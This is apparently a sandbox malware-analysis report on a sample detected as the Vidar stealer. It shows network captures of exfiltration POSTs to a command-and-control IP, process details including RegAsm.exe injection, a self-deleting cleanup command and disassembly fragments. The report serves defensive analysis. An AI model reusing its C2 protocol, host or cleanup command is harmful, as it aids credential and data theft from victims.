                                                                              2024-05-17 16:06:47 UTC325OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBA
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 453
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:47 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------KFBFCAFCBKFIEBFHIDBACont
                                                                              2024-05-17 16:06:48 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:48 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:48 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.54973195.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:51 UTC327OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 98013
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:51 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------HIEBAKEHDHCAKEBFBKEGCont
                                                                              2024-05-17 16:06:51 UTC16355OUTData Raw: 4e 42 69 55 55 55 55 44 45 70 4b 64 53 59 6f 75 41 6c 4a 54 73 55 30 30 44 43 6b 70 61 4b 42 6a 54 52 53 30 6c 41 77 37 55 6c 4c 69 6b 78 51 4d 53 6b 70 31 4a 69 6b 41 6c 4a 53 39 61 53 67 59 6e 65 6b 37 55 36 6b 49 6f 4b 45 4e 4a 54 6a 53 45 55 44 47 39 44 52 53 6d 6b 36 30 41 4a 31 70 43 4b 64 6a 46 4e 49 6f 4b 43 6b 50 49 70 63 55 6e 30 47 4b 41 43 6b 70 63 63 35 6f 6f 47 4e 6f 70 61 54 76 38 41 31 6f 47 49 65 52 51 65 52 53 30 55 44 47 35 2f 45 55 6e 53 6e 48 76 54 63 63 55 44 44 38 4b 4f 76 2f 31 36 58 6e 48 72 53 48 6e 32 6f 47 49 65 61 4d 5a 70 66 30 70 4d 5a 2f 77 6f 41 54 38 50 7a 6f 36 30 55 70 6f 47 4e 78 78 33 70 4f 31 4f 50 76 53 47 6d 41 6c 42 48 72 52 30 6f 50 74 53 47 4a 2f 6b 30 67 2f 47 6e 48 6d 6d 30 77 51 5a 39 4d 55 48 38 2f 72 52 6d
                                                                              Data Ascii: NBiUUUUDEpKdSYouAlJTsU00DCkpaKBjTRS0lAw7UlLikxQMSkp1JikAlJS9aSgYnek7U6kIoKENJTjSEUDG9DRSmk60AJ1pCKdjFNIoKCkPIpcUn0GKACkpcc5ooGNopaTv8A1oGIeRQeRS0UDG5/EUnSnHvTccUDD8KOv/16XnHrSHn2oGIeaMZpf0pMZ/woAT8Pzo60UpoGNxx3pO1OPvSGmAlBHrR0oPtSGJ/k0g/GnHmm0wQZ9MUH8/rRm
                                                                              2024-05-17 16:06:51 UTC16355OUTData Raw: 31 70 33 53 6b 4e 49 61 45 36 30 6d 50 31 70 54 31 70 44 78 39 4b 43 6a 76 61 68 75 44 69 4d 66 57 70 71 69 6e 58 64 43 32 4f 6f 35 72 79 38 66 43 55 38 4c 55 6a 48 65 7a 50 6d 36 44 53 71 78 62 37 6c 4b 54 35 31 78 33 37 56 31 76 69 67 6d 44 77 7a 34 59 74 6f 73 69 33 4e 70 35 70 41 36 46 79 41 57 2f 45 45 6e 38 36 35 44 64 58 59 61 52 63 32 58 69 50 77 39 48 6f 46 39 63 70 62 58 6c 73 78 61 79 6e 6b 50 79 74 6e 71 68 50 2b 65 33 70 58 78 6d 55 31 71 64 44 46 52 6e 55 32 50 73 71 4f 4c 71 53 77 72 77 62 65 6c 37 72 31 36 72 35 2f 31 75 63 6c 6d 75 68 38 45 54 79 78 65 4c 37 45 52 48 37 37 4d 6a 44 31 55 71 63 2f 34 2f 68 54 4a 76 41 2f 69 4f 47 66 79 76 37 4f 64 2b 63 42 30 64 53 70 2f 48 50 48 34 31 30 33 68 37 52 49 2f 43 73 35 75 64 51 6c 69 66 56 6e
                                                                              Data Ascii: 1p3SkNIaE60mP1pT1pDx9KCjvahuDiMfWpqinXdC2Oo5ry8fCU8LUjHezPm6DSqxb7lKT51x37V1vigmDwz4Ytosi3Np5pA6FyAW/EEn865DdXYaRc2XiPw9HoF9cpbXlsxaynkPytnqhP+e3pXxmU1qdDFRnU2PsqOLqSwrwbel7r16r5/1uclmuh8ETyxeL7ERH77MjD1Uqc/4/hTJvA/iOGfyv7Od+cB0dSp/HPH4103h7RI/Cs5udQlifVn
                                                                              2024-05-17 16:06:51 UTC16355OUTData Raw: 52 2b 46 53 79 6b 49 4f 76 4e 49 66 65 6c 48 4e 42 41 71 52 69 66 70 53 55 64 54 37 30 45 2f 35 46 49 59 68 35 70 44 52 69 6b 7a 53 48 59 4f 70 2f 70 53 48 70 6d 6a 2f 41 44 7a 52 32 70 46 48 6f 46 46 46 46 59 48 79 67 55 56 31 74 70 34 4c 57 36 73 6f 4c 6a 2b 30 6c 54 7a 59 31 66 62 35 4a 4f 4d 6a 4f 4f 74 52 7a 2b 46 39 4d 74 5a 6d 68 75 50 45 31 68 44 4b 75 4d 78 79 6c 56 59 5a 47 52 6b 46 73 39 44 58 6a 78 7a 65 4d 6e 5a 51 62 50 6f 70 63 4f 56 49 71 37 71 4a 48 4c 55 56 30 76 38 41 77 6a 2b 69 2f 77 44 51 32 61 58 2f 41 4e 2f 45 2f 77 44 69 36 75 57 6e 67 69 43 2f 69 4d 74 6e 72 6c 74 63 52 68 74 70 65 46 51 34 42 39 4d 68 75 76 49 70 76 4e 6c 46 58 63 47 43 34 65 6e 4a 32 56 52 48 48 55 56 33 34 38 41 6f 41 41 62 6d 4d 6b 42 51 54 35 62 63 34 50 50
                                                                              Data Ascii: R+FSykIOvNIfelHNBAqRifpSUdT70E/5FIYh5pDRikzSHYOp/pSHpmj/ADzR2pFHoFFFFYHygUV1tp4LW6soLj+0lTzY1fb5JOMjOOtRz+F9MtZmhuPE1hDKuMxylVYZGRkFs9DXjxzeMnZQbPopcOVIq7qJHLUV0v8Awj+i/wDQ2aX/AN/E/wDi6uWngiC/iMtnrltcRhtpeFQ4B9MhuvIpvNlFXcGC4enJ2VRHHUV348AoAAbmMkBQT5bc4PP
                                                                              2024-05-17 16:06:51 UTC16355OUTData Raw: 6d 6b 50 4e 41 78 4d 30 6d 63 64 4b 58 70 33 70 50 79 6f 47 47 65 65 4b 51 35 36 63 30 41 2b 2f 57 67 2f 6a 51 4d 51 30 68 4f 61 57 6b 70 44 45 37 30 64 4b 44 31 35 6f 48 2f 77 42 61 67 59 6e 52 6a 51 61 44 2b 64 48 38 76 65 67 42 43 53 44 53 64 42 53 39 66 77 6f 78 52 63 59 6e 53 69 69 6a 6b 44 31 70 44 50 52 61 4b 4b 4b 67 2b 51 43 69 74 72 77 7a 70 31 76 71 65 6f 79 77 58 4b 46 6b 45 4a 59 59 4a 47 44 75 55 64 76 71 61 33 35 50 44 65 6e 77 76 68 37 58 6a 73 52 49 32 44 2b 74 65 4c 6a 38 39 77 2b 42 71 2b 79 71 52 6b 33 35 4a 66 35 6f 39 76 41 5a 44 69 63 64 53 39 74 53 6c 46 4c 7a 62 2f 79 5a 77 31 46 64 30 76 68 37 53 6a 31 74 66 2f 49 6a 66 34 31 56 31 72 52 4e 4f 74 4e 47 6e 6e 67 74 39 6b 71 62 64 72 62 32 50 56 67 4f 35 39 36 35 71 48 45 2b 45 72
                                                                              Data Ascii: mkPNAxM0mcdKXp3pPyoGGeeKQ56c0A+/Wg/jQMQ0hOaWkpDE70dKD15oH/wBagYnRjQaD+dH8vegBCSDSdBS9fwoxRcYnSiijkD1pDPRaKKKg+QCitrwzp1vqeoywXKFkEJYYJGDuUdvqa35PDenwvh7XjsRI2D+teLj89w+Bq+yqRk35Jf5o9vAZDicdS9tSlFLzb/yZw1Fd0vh7Sj1tf/Ijf41V1rRNOtNGnngt9kqbdrb2PVgO5965qHE+Er
                                                                              2024-05-17 16:06:51 UTC16238OUTData Raw: 53 55 74 4a 51 4d 4b 51 39 36 57 6b 6f 41 53 6b 70 61 54 46 42 51 55 6c 4c 7a 53 55 41 49 61 53 6c 4e 42 6f 47 4a 53 55 74 4a 51 4d 51 30 6c 4b 61 4b 42 69 55 66 30 70 61 61 65 61 59 77 36 55 68 70 63 38 30 68 35 70 44 45 50 53 6a 70 52 33 6f 2f 47 67 59 48 2b 74 4e 49 70 31 4a 7a 54 47 4a 53 5a 35 70 54 31 70 4b 42 69 59 6f 70 61 4d 66 6e 53 47 4a 53 59 78 2b 64 4b 61 53 67 59 59 70 4f 39 42 34 6f 78 2b 4e 41 78 44 52 51 61 4f 39 41 42 53 63 48 72 7a 52 52 37 55 44 45 50 48 70 52 33 39 36 44 31 78 30 6f 48 46 41 77 50 4e 4a 31 39 36 58 46 47 61 41 45 49 70 44 2f 41 4a 35 70 65 67 7a 2b 46 4a 51 4d 39 45 6f 6f 6f 71 44 35 49 33 2f 42 2f 77 44 79 48 6c 2f 36 35 74 2f 53 76 51 34 6a 2b 2f 54 36 31 35 33 34 51 2f 35 44 71 2f 38 41 58 4e 76 36 56 33 7a 51 43
                                                                              Data Ascii: SUtJQMKQ96WkoASkpaTFBQUlLzSUAIaSlNBoGJSUtJQMQ0lKaKBiUf0paaeaYw6Uhpc80h5pDEPSjpR3o/GgYH+tNIp1JzTGJSZ5pT1pKBiYopaMfnSGJSYx+dKaSgYYpO9B4ox+NAxDRQaO9ABScHrzRR7UDEPHpR396D1x0oHFAwPNJ196XFGaAEIpD/AJ5pegz+FJQM9EoooqD5I3/B/wDyHl/65t/SvQ4j+/T61534Q/5Dq/8AXNv6V3zQC
                                                                              2024-05-17 16:06:53 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:52 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:53 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.54973295.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:54 UTC325OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDH
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:54 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------IDBAKKECAEGCAKFIIIDHCont
                                                                              2024-05-17 16:06:55 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.54973395.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:56 UTC325OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBF
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:56 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------EGCGHCBKFCFBFHIDHDBFCont
                                                                              2024-05-17 16:06:57 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:12:05:49
                                                                              Start date:17/05/2024
                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                              Imagebase:0xab0000
                                                                              File size:372'224 bytes
                                                                              MD5 hash:75DB6DFDEBB9BF0D98ACFC15F2219C62
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:12:05:49
                                                                              Start date:17/05/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:12:05:49
                                                                              Start date:17/05/2024
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                              Imagebase:0x8c0000
                                                                              File size:65'440 bytes
                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:12:06:58
                                                                              Start date:17/05/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit
                                                                              Imagebase:0x790000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:8
                                                                              Start time:12:06:58
                                                                              Start date:17/05/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:12:06:58
                                                                              Start date:17/05/2024
                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:timeout /t 10
                                                                              Imagebase:0x1f0000
                                                                              File size:25'088 bytes
                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:6%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:2.7%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:60
                                                                                execution_graph 16230 ac1cad 16231 ac1cbc 16230->16231 16235 ac1cd1 16230->16235 16232 abd381 __Wcrtomb 14 API calls 16231->16232 16233 ac1cc1 16232->16233 16234 aba48f __strnicoll 42 API calls 16233->16234 16244 ac1ccc 16234->16244 16236 ac1d2f 16235->16236 16237 ac2467 _Ungetc 14 API calls 16235->16237 16235->16244 16238 ac1af7 _Ungetc 42 API calls 16236->16238 16237->16236 16239 ac1d5f 16238->16239 16250 ac9eff 16239->16250 16242 ac1af7 _Ungetc 42 API calls 16243 ac1da1 16242->16243 16243->16244 16245 ac1af7 _Ungetc 42 API calls 16243->16245 16246 ac1daf 16245->16246 16246->16244 16247 ac1af7 _Ungetc 42 API calls 16246->16247 16248 ac1dbd 16247->16248 16249 ac1af7 _Ungetc 42 API calls 16248->16249 16249->16244 16251 ac9f0b __FrameHandler3::FrameUnwindToState 16250->16251 16252 ac9f2b 16251->16252 16253 ac9f13 16251->16253 16254 ac9fe8 16252->16254 16258 ac9f61 16252->16258 16255 abd36e __dosmaperr 14 API calls 16253->16255 16256 abd36e __dosmaperr 14 API calls 16254->16256 16257 ac9f18 16255->16257 16259 ac9fed 16256->16259 16260 abd381 __Wcrtomb 14 API calls 16257->16260 16261 ac9f7f 16258->16261 16262 ac9f6a 16258->16262 16263 abd381 __Wcrtomb 14 API calls 16259->16263 16279 ac1d67 16260->16279 16280 ac6e10 EnterCriticalSection 16261->16280 16264 abd36e __dosmaperr 14 API calls 16262->16264 16266 ac9f77 16263->16266 16267 ac9f6f 16264->16267 16272 aba48f __strnicoll 42 API calls 16266->16272 16269 abd381 __Wcrtomb 14 API calls 16267->16269 16268 ac9f85 16270 ac9fb6 16268->16270 16271 ac9fa1 16268->16271 16269->16266 16281 aca013 16270->16281 16274 abd381 __Wcrtomb 14 API calls 16271->16274 16272->16279 16276 ac9fa6 16274->16276 16275 ac9fb1 16344 ac9fe0 16275->16344 16277 abd36e __dosmaperr 14 API calls 16276->16277 16277->16275 16279->16242 16279->16244 16280->16268 16282 aca03d 16281->16282 16283 aca025 16281->16283 16285 aca393 16282->16285 16290 aca083 16282->16290 16284 abd36e __dosmaperr 14 API calls 16283->16284 16286 aca02a 16284->16286 16287 abd36e __dosmaperr 14 API calls 16285->16287 16288 abd381 __Wcrtomb 14 API calls 16286->16288 16289 aca398 16287->16289 16291 aca032 16288->16291 16292 abd381 __Wcrtomb 14 API calls 16289->16292 16290->16291 16293 aca08e 16290->16293 16297 aca0be 16290->16297 16291->16275 16294 aca09b 16292->16294 16295 abd36e __dosmaperr 14 API calls 16293->16295 16298 aba48f __strnicoll 42 API calls 16294->16298 16296 aca093 16295->16296 16299 abd381 __Wcrtomb 14 API calls 16296->16299 16300 aca0d7 16297->16300 16301 aca0f1 16297->16301 16302 aca122 16297->16302 16298->16291 16299->16294 16300->16301 16335 aca0dc 16300->16335 16303 abd36e __dosmaperr 14 API calls 16301->16303 16304 ac3c5d std::_Locinfo::_Locinfo_dtor 15 API calls 16302->16304 16305 aca0f6 16303->16305 16306 aca133 16304->16306 16307 abd381 __Wcrtomb 14 API calls 16305->16307 16309 ac0ac8 ___free_lconv_mon 14 API calls 16306->16309 16310 aca0fd 16307->16310 16308 aca462 ___scrt_uninitialize_crt 42 API calls 16311 aca26f 16308->16311 16312 aca13c 16309->16312 16313 aba48f __strnicoll 42 API calls 16310->16313 16314 aca2e3 16311->16314 16317 aca288 GetConsoleMode 16311->16317 16315 ac0ac8 ___free_lconv_mon 14 API calls 16312->16315 16343 aca108 16313->16343 16316 aca2e7 ReadFile 16314->16316 16319 aca143 16315->16319 16320 aca2ff 16316->16320 16321 aca35b GetLastError 16316->16321 16317->16314 16318 aca299 16317->16318 16318->16316 16322 aca29f ReadConsoleW 16318->16322 16323 aca14d 16319->16323 16324 aca168 16319->16324 16320->16321 16327 aca2d8 16320->16327 16325 aca2bf 16321->16325 16326 aca368 16321->16326 16322->16327 16328 aca2b9 GetLastError 16322->16328 16330 abd381 __Wcrtomb 14 API calls 16323->16330 16347 ac3ada 16324->16347 16333 abd327 __dosmaperr 14 API calls 16325->16333 16325->16343 16332 abd381 __Wcrtomb 14 API calls 16326->16332 16338 aca33b 16327->16338 16339 aca324 16327->16339 16327->16343 16328->16325 16329 ac0ac8 ___free_lconv_mon 14 API calls 16329->16291 16334 aca152 16330->16334 16336 aca36d 16332->16336 16333->16343 16340 abd36e __dosmaperr 14 API calls 16334->16340 16335->16308 16337 abd36e __dosmaperr 14 API calls 16336->16337 16337->16343 16338->16343 16366 ac9b85 16338->16366 16353 ac9d2d 16339->16353 16340->16343 16343->16329 16378 ac6e33 LeaveCriticalSection 16344->16378 16346 ac9fe6 16346->16279 16348 ac3aee _Fputc 16347->16348 16349 ac39f9 ___scrt_uninitialize_crt 44 API calls 16348->16349 16350 ac3b03 16349->16350 16351 aba1cb _Fputc 42 API calls 16350->16351 16352 ac3b12 16351->16352 16352->16335 16372 ac9a39 16353->16372 16355 ac53eb __strnicoll MultiByteToWideChar 16357 ac9e41 16355->16357 16360 ac9e4a GetLastError 16357->16360 16363 ac9d75 16357->16363 16358 ac9dcf 16364 ac3ada 44 API calls 16358->16364 16365 ac9d89 16358->16365 16359 ac9dbf 16361 abd381 __Wcrtomb 14 API calls 16359->16361 16362 abd327 __dosmaperr 14 API calls 16360->16362 16361->16363 16362->16363 16363->16343 16364->16365 16365->16355 16367 ac9bbc 16366->16367 16368 ac9c51 ReadFile 16367->16368 16369 ac9c4c 16367->16369 16368->16369 16370 ac9c6e 16368->16370 16369->16343 16370->16369 16371 ac3ada 44 API calls 16370->16371 16371->16369 16373 ac9a6d 16372->16373 16374 ac9ad7 16373->16374 16375 ac9adc ReadFile 16373->16375 16374->16358 16374->16359 16374->16363 16374->16365 16375->16374 16376 ac9af5 16375->16376 16376->16374 16377 ac3ada 44 API calls 16376->16377 16377->16374 16378->16346 16387 ab10ac 16392 ab4f6b 16387->16392 16393 